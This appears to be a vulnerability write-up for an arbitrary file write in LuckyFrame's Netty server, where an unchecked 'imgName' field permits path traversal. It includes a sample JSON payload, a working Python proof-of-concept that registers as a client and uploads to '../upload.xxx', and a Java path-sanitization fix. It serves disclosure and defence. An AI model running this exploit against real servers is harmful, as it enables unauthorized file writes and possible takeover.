The server is started with Netty and processes incoming messages in ServerHandler#channelRead.
Each message is parsed as JSON with fastjson, and the request method is selected by the CLIENT_METHOD ("method") field in the data.
com.luckyframe.common.netty.ServerHandler#channelRead
When handling the upload request method, com.luckyframe.common.netty.ServerHandler#channelRead takes IMG_NAME ("imgName") from the data body and splices it directly into the destination path, resulting in an arbitrary file write vulnerability.
The important field is imgName, which is the destination filename on the server.
The content of the file is controlled by fileUploadFile, where bytes is the base64-encoded data and starPos and endPos are the start position and end position respectively.
{
    "imgName": "file",
    "method": "upload",
    "data": {
        "code": 1,
        "fileUploadFile": {
            "bytes": "YWJjZGVmZ2hpag==",
            "endPos": 10,
            "file": "",
            "starPos": 0
        },
        "message": "test",
        "uniId": "2131231"
    },
    "start": 0,
    "uuid": "1231231"
}
Scripting with Python
import socket
import base64

dst_filename = "../upload.xxx"
file_content = "Upload Success!!!!"
b64_file_content = base64.b64encode(file_content.encode()).decode()
content_length = len(file_content)

upload_data = str({
    "imgName": dst_filename,
    "method": "upload",
    "data": {
        "code": 1,
        "fileUploadFile": {
            "bytes": b64_file_content,
            "endPos": content_length,
            "file": "",
            "starPos": 0
        },
        "message": "test",
        "uniId": "2131231"
    },
    "start": 0,
    "uuid": "1231231"
})

register_client_data = str({
    "hostName": "172.22.96.22", "method": "clientUp",
    "clientName": "", "ip": "172.22.96.22", "version": "3.5"
})

client = socket.socket()
client.connect(("192.168.157.1", 7070))
client.send(f'{register_client_data}$_'.encode())
print(client.recv(4096))
client.send(f"{upload_data}$_".encode())
print(client.recv(65535))
client.close()
The file is uploaded successfully.
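
The root cause above is that imgName reaches the file path unchecked. One way to constrain it on the server side is sketched below as an added example; it is not LuckyFrame's code, and the class name, the resolveUpload helper and the temporary upload directory are hypothetical.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.InvalidPathException;
import java.nio.file.Path;

// Added example: SafeUploadPath and resolveUpload are hypothetical names, not LuckyFrame code.
public class SafeUploadPath {

    /** Resolve a client-supplied imgName strictly inside baseDir, or throw. */
    static Path resolveUpload(Path baseDir, String imgName) throws IOException {
        if (imgName == null || imgName.isEmpty() || imgName.indexOf('\0') >= 0) {
            throw new IOException("empty or malformed imgName");
        }
        // Reject separators outright, whichever OS the client or the server runs on.
        if (imgName.contains("/") || imgName.contains("\\")) {
            throw new IOException("imgName must be a bare file name: " + imgName);
        }
        Path base = baseDir.toAbsolutePath().normalize();
        Path target;
        try {
            target = base.resolve(imgName).normalize();
        } catch (InvalidPathException e) {
            throw new IOException("invalid imgName", e);
        }
        // Defence in depth: the normalized result must be a direct child of base.
        // This also rejects "." and "..", which contain no separator.
        if (!base.equals(target.getParent())) {
            throw new IOException("imgName escapes upload directory: " + imgName);
        }
        return target;
    }

    public static void main(String[] args) throws IOException {
        Path base = Files.createTempDirectory("upload-demo"); // stand-in upload directory
        // Constructed inputs: the name from the sample JSON, the name from the script, and variants.
        String[] names = {"file", "../upload.xxx", "..", "a/../../b", "..\\upload.xxx"};
        for (String n : names) {
            try {
                System.out.println("accept " + n + " -> " + resolveUpload(base, n));
            } catch (IOException e) {
                System.out.println("reject " + n + " (" + e.getMessage() + ")");
            }
        }
    }
}
```

Only "file" is accepted; every other sample name is rejected before any write would take place.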